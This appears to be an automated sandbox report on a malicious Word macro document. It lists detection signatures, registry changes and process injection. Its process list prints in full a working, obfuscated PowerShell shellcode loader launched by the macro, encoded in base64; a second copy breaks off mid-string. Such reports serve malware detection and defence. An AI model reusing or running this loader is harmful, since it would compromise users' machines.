Malware Analysis Report

2024-10-16 06:29

Sample ID 240527-gqj8rabc53
Target 587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603
SHA256 587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603
Tags
macro macro_on_action execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603

Threat Level: Known bad

The file 587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603 was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action execution

Process spawned unexpected child process

Suspicious Office macro

Office macro that triggers on suspicious action

Drops file in Windows directory

Command and Scripting Interpreter: PowerShell

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 06:00

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 06:00

Reported

2024-05-27 06:01

Platform

win7-20240508-en

Max time kernel

47s

Max time network

58s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603.doc"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1852 wrote to memory of 2784 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1852 wrote to memory of 2784 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1852 wrote to memory of 2784 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1852 wrote to memory of 2784 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1852 wrote to memory of 2912 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1852 wrote to memory of 2912 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1852 wrote to memory of 2912 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1852 wrote to memory of 2912 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 2756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 2756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 2756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 2756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2684 wrote to memory of 2584 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2684 wrote to memory of 2584 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2684 wrote to memory of 2584 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2684 wrote to memory of 2584 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2584 wrote to memory of 3004 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2584 wrote to memory of 3004 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2584 wrote to memory of 3004 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2584 wrote to memory of 3004 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /w 1 /C "sv hYq -;sv pjO ec;sv maq ((gv hYq).value.toString()+(gv pjO).value.toString());powershell (gv maq).value.toString() ('JABQAE4APQAnACQAUABMAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAIgArACIAbgAiACsAIgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByACIAKwAiAG4AIgArACIAZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABjAHIAbQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAVwBRAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGYAZgAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA1ADcALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA1ADAALAB9ADgAYgAsAH0ANAA4ACwAfQAxADgALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADMAMQAsAH0AZgBmACwAfQA0ADkALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AYQBjACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADAALAB9AGEAOAAsAH0AZQAwACwAfQBhAGQALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADEAMQAsAH0ANQBjACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABhACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0AZQA4ACwAfQA2ADcALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0AMAAwACwAfQA2AGEALAB9ADAANAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAyACwAfQBkADkALAB9AGMAOAAsAH0ANQBmACwAfQBmAGYALAB9AGQANQAsAH0AOAAzACwAfQBmADgALAB9ADAAMAAsAH0ANwBlACwAfQAzADYALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAO'+'AAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZAAsAH0AMgA4ACwAfQA1ADgALAB9ADYAOAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADAAYgAsAH0AMgBmACwAfQAwAGYALAB9ADMAMAAsAH0AZgBmACwAfQBkADUALAB9ADUANwAsAH0ANgA4ACwAfQA3ADUALAB9ADYAZQAsAH0ANABkACwAfQA2ADEALAB9AGYAZgAsAH0AZAA1ACwAfQA1AGUALAB9ADUAZQAsAH0AZgBmACwAfQAwAGMALAB9ADIANAAsAH0AMABmACwAfQA4ADUALAB9ADcAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AZQA5ACwAfQA5AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBjADEALAB9AGMAMwAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAHYARwA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAUABMACAALQBOAGEAbQBlACAAIgBwAHgAIgAgAC0AbgBhAG0AZQBzACAAcQB5AGIAOwAkAHYARwA9ACQAdgBHAC4AcgBlAHAAbABhAGMAZQAoACIAcQB5AGIAIgAsACAAIgBXAGkAbgAzADIARgB1AG4AYwB0ACIAKwAiAGkAIgArACIAbwBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQAVwBRACAAPQAgACQAVwBRAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBTAGoAbQB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAFMAagBtACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABzAEYAPQAwAHgAMQAwADAANwA7AGkAZgAgACgAJABXAFEALgBMACAALQBnAHQAIAAwAHgAMQAwADAANwApAHsAJABzAEYAPQAkAFcAUQAuAEwAfQA7ACQAVQBQAD0AJAB2AEcAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADcALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAGMAcgBtACAAPQAgADAAOwBmAG8AcgAoACQAUwBvAD0AMAA7ACQAUwBvACAALQBsAGUAKAAkAFcAUQAuAEwAZQBuAGcAdABoAC0AMQApADsAJABTAG8AKwArACkAewAkAHYARwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAUAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABTAG8AKQAsACAAJABXAFEAWwAkAFMAbwBdACwAIAAxACkAfQA7ACQAdgBHADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAFUAUAAsACAAMAB4ADEAMAAwADcALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAGMAcgBtACkAOwAkAG8AbQBsAD0AWwBpAG4AdABdADAAeAAwADAAOwAkAHYARwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABbAGkAbgB0AF0AMAAsACQAbwBtAGwALAAkAFUAUAAsADAALAAwACwAMQAtADEAKQA7ACcAOwAkAFoATwA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAUABOACkAKQA7ACQAdgBJAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAHEARwA9ACIAVwBpAG4AZABvAHcAcwAiADsAJABjAFYAVgAgAD0AIAAiAEMAOgBcACQAcQBHAFwASgB1AEcAUQBZAFcAXAAkAHEARwAkAHYASQBcAHYAMQAuADAAXAAkAHYASQAiADsAJABjAFYAVgAgAD0AIAAkAGMAVgBWAC4AcgBlAHAAbABhAGMAZQAoACIASgB1AEcAIgAsACAAIgBzAHkAcwAiACkAOwAkAGMAVgBWACAAPQAgACQAYwBWAFYALgByAGUAcABsAGEAYwBlACgAIgBRAFkAVwAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAHYAbgBSACAAPQAgACcAVAAiACsAIgByACIAKwAiAHUAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAbgBSACcAKQB7ACQAdgBJAD0AIAAkAGMAVgBWAH0AOwAkAEEAaAA9ACIAIAAkAHYASQAgAEYAYwBMAFEAIAAkAFoATwAiADsAJABBAGgAPQAkAEEAaAAuAHIAZQBwAGwAYQBjAGUAKAAiAEYAYwBMAFEAIgAsACAAIgAtAG4AbwBlAHgAaQB0ACAALQBlACIAKQA7AGkAZQB4ACAAJABBAGgA')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABQAE4APQAnACQAUABMAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAIgArACIAbgAiACsAIgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByACIAKwAiAG4AIgArACIAZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABjAHIAbQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAVwBRAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGYAZgAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA1ADcALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA1ADAALAB9ADgAYgAsAH0ANAA4ACwAfQAxADgALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADMAMQAsAH0AZgBmACwAfQA0ADkALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AYQBjACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAf